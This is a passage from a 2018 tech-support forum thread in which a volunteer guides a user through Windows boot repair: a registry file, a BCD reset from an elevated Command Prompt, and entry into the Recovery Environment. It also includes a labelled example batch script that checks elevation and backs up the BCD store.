
 

Here is GP_Edit.reg:  
 
 
Edit Group Policy
Note: Follow these steps carefully and completely and in sequence.

  • Please download the attached GP_Edit.reg file and transfer it to the desktop on your sick laptop.
  • Double-click GP_Edit.reg on the desktop of your laptop. (Please do not run GP_Edit.reg on your clean PC.)
  • Click Yes in the User Account Control pop-up window.
  • The Registry Editor pop-up will ask you, "Are you sure you want to continue?". Click Yes.
  • The Registry Editor pop-up will say, "The keys and values ... have been successfully added to the registry". Click OK.
  • Restart your laptop in normal boot.

Stop here
Please don't do anything else with your laptop until you see, "The keys and values ... have been successfully added to the registry". Wait for further instructions.
 
 
In your next reply...

  • Please promise me that you will give me complete descriptions of all the symptoms you see and a word-for-word copy of any messages you see whenever you encounter on your laptop a failure or blockage or unexpected symptoms in any prescribed procedure.
  • Confirm that you did see, "The keys and values ... have been successfully added to the registry" and that you restarted your laptop.

Thank you,
 
Ray




#37 danban


Posted 19 June 2018 - 11:28 AM

Hello Ray ,

This is Dan.

 

I didn't do too much yet because of what happened when I attempted to open command prompt.

 

Here's what I did - 

 

  • download the attached GP_Edit.reg file and transfer it to the desktop on your sick laptop.
  • Double-click GP_Edit.reg on the desktop of your laptop. (Please do not run GP_Edit.reg on your clean PC.)

Then the black box appeared and this is what it said on the top -

 

ERROR = You must run the command prompt as admisntrator.

Press any key to continue . . . 

 

Ok , what should I do now , press the key ? and what I should do afterwards ?

I wanted to be safe to ask you before I start anything

 

Best ,

Dan



#38 RayS


Posted 19 June 2018 - 08:25 PM

Hi Dan,

 

Thank you for a complete description of what you saw. The GP_Edit.reg file doesn't open a black window. You probably double-clicked BCDReset.bat. Please look carefully at the files on the desktop of your sick laptop and double-click the GP_Edit.reg file. A small pop-up window with black text on a white background will open. The title of that pop-up is Registry Editor. Then you can continue with the instructions in Post #36.

 

Thank you,

 

Ray


Edited by RayS, 19 June 2018 - 08:27 PM.



#39 danban


Posted 21 June 2018 - 11:25 AM

Hello Ray ,

This is Dan.

 

I did what you said ,

 

  • I downloaded the attached GP_Edit.reg file and transferred it to the desktop on my sick laptop.
  • I double-clicked GP_Edit.reg on the desktop of my laptop. (Please do not run GP_Edit.reg on your clean PC.)
  • I clicked Yes in the User Account Control pop-up window.
  • The Registry Editor pop-up asked me, "Are you sure you want to continue?".
  • I clicked Yes.
  • The Registry Editor pop-up said, "The keys and values ... have been successfully added to the registry".
  • I clicked OK.
  • I restarted my laptop in normal boot.

 

Let me know what to do next.

 

Best ,

Dan



#40 RayS


Posted 21 June 2018 - 01:38 PM

Hey Dan,

 

Excellent!!!

 

You did well. I'll have more instructions for you later tonight.

 

Ray




#41 RayS


Posted 21 June 2018 - 09:20 PM

Hi Dan,

 

Note: This is second of two consecutive posts.

 

 

Congrats again on doing a good job.
 
Overview
Now that GP_Edit.reg was successful, let's try to reset the BCD store again in normal boot using BCDReset.bat which should still be on your thumb drive. Then I want to try to enter Recovery Environment (RE) by aborting start-up two consecutive times. If Recovery Environment is not still blocked, we will run a fix in RE next time.
 
If the Batch file (BCDreset.bat) is no longer on your thumb drive, you can get it again here: BCDreset.bat
 
Please read this all the way through before you begin.
 
Reset BCD store

  1. If your laptop is not already started, restart in normal boot.
  2. Insert the thumb drive into your sick laptop.
  3. Use Windows Explorer to find the drive letter of your thumb drive on your sick laptop. The drive letter will probably be D:\
  4. Press your Windows key and type Command Prompt into the search box.
  5. Right-click Command Prompt in your search results and select Run as administrator  <== Important!
  6. When the black Command Prompt window opens, be sure the title of the window is Administrator: Command Prompt
  7. If the title of the window is not Administrator: Command Prompt then you did something wrong. Close the black Command Prompt window and go back to step 4 and try again (be sure to right-click).
  8. Type D:\BCDreset into the Command Prompt window and press Enter. If your thumb drive is on some other letter, then type that letter instead of D.
  9. You should see Success in the Command Prompt window.
  10. You should also see a file called BCD_Reset.txt on your thumb drive.
  11. Copy and paste the contents of BCD_Reset.txt into your reply.

 

 

Enter Recovery Environment using Consecutive Power Interruptions
Note: If you see the black screen with the circling dots going around, that means you didn't interrupt the boot-up process quickly enough in step 3 below.

  1. Begin with your sick laptop completely shut down (power OFF).
  2. Press the physical power button to begin the boot-up process.
  3. After only 3 or 4 seconds, press and hold the power button for a minimum of six seconds to shut down your laptop.
  4. Repeat steps 1 through 3 a second time.
  5. Press the power button again to begin the boot-up process for a third time and let it continue to completion.

If all went well, you should see Preparing Automatic Repair on a black screen. After a short delay, you should see Diagnosing your PC.

  • On the Automatic Repair screen, click Advanced options.
  • On the next screen, click Troubleshoot.
  • On the next screen, click Advanced options.
  • On the next screen, click Command Prompt.

Do you see x:\windows\system32> and a blinking cursor? If you don't see this, describe all symptoms. What step failed and what did you see?
 
 
Please stop here. If all went well, we will run a fix in RE next time.
 
 
In your next reply...

  • Copy and paste the entire contents of BCD_Reset.txt into the body of your message.
  • If you can't find BCD_Reset.txt in the root directory of your thumb drive or if you didn't see Success when you tried to reset BCD store, tell me what step failed and what did you see. Give me a full description.
  • Did you see x:\windows\system32> and a blinking cursor? If not, which step failed? What did you see? Give me a full description.

Thank you,
 
Ray

Edit: Note indicating this is 2nd of 2 consecutive posts.


Edited by RayS, 21 June 2018 - 11:20 PM.

I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.
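The administrator requirement stated in posts #36 and #41, as an added example that is not part of the thread and is not the BCDreset.bat attached there: a batch file that refuses to run without elevation, backs up the BCD store before anything is changed, and writes a log to the thumb drive. The file names BCD_Check.txt and BCD_Backup and the drive-letter argument are assumptions made for this example.

```batch
@echo off
rem Added example, not the helper's BCDreset.bat.
rem Assumption: the thumb drive letter is passed as the first argument (e.g. D:).
rem If no argument is given, the drive this script was started from is used.
setlocal
set "OUT=%~1"
if "%OUT%"=="" set "OUT=%~d0"
set "LOG=%OUT%\BCD_Check.txt"

rem An elevated administrator token carries the High Mandatory Level SID
rem (S-1-16-12288). The SYSTEM account used by the Recovery Environment
rem carries the System Mandatory Level SID (S-1-16-16384) instead.
whoami /groups | findstr /c:"S-1-16-12288" /c:"S-1-16-16384" >nul
if errorlevel 1 (
    echo ERROR: this window is not elevated. Use "Run as administrator".
    pause
    exit /b 1
)

rem bcdedit only works from an elevated prompt. Export a backup copy of the
rem BCD store first so that any later change can be undone.
> "%LOG%" echo START %DATE% %TIME%
bcdedit /export "%OUT%\BCD_Backup" >> "%LOG%" 2>&1
if errorlevel 1 (
    >> "%LOG%" echo Backup FAILED, no changes attempted.
    echo Backup failed. See %LOG%
    exit /b 2
)

rem Record the default boot loader entry so a helper can read its settings.
bcdedit /enum {default} >> "%LOG%" 2>&1
>> "%LOG%" echo END
echo Success. Log written to %LOG%
endlocal
```

Started from a non-elevated Command Prompt, this stops at the first check with an error message and changes nothing, which is the same kind of symptom described in post #37.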


#42 danban


Posted 22 June 2018 - 11:09 AM

Hello Ray , 

This is Dan.

 

Ok, I'll get right on it tonight.

I may be able to send all data using wordpad tomorrow Saturday on another computer,

if not, it will be definitely Sunday night when I have access to it.

 

Best ,

Dan



#43 RayS


Posted 22 June 2018 - 01:34 PM

Hi Dan,

 

I may be able to send all data using wordpad tomorrow

I hope that was a typo. You need to use Notepad  --  not any other word processor or text editor.

 

Thank you,

 

Ray




#44 danban


Posted 22 June 2018 - 01:39 PM

Yeah , that was a typo , 

Notepad , trust me , I know what to use for future logs.

 

Best ,

Dan



#45 danban


Posted 24 June 2018 - 12:27 PM

Hello Ray ,

It's Dan.

 

Ok , great , everything worked perfect.

After I did what you told me the end result was

 

I saw  x:\windows\system32> and a blinking cursor in the command prompt.

 

I did all the steps you asked , so need to show.

 

Let me know what we do next.

 

Here's the BCD_Reset.txt

 

START 

The operation completed successfully.
The operation completed successfully.
END 




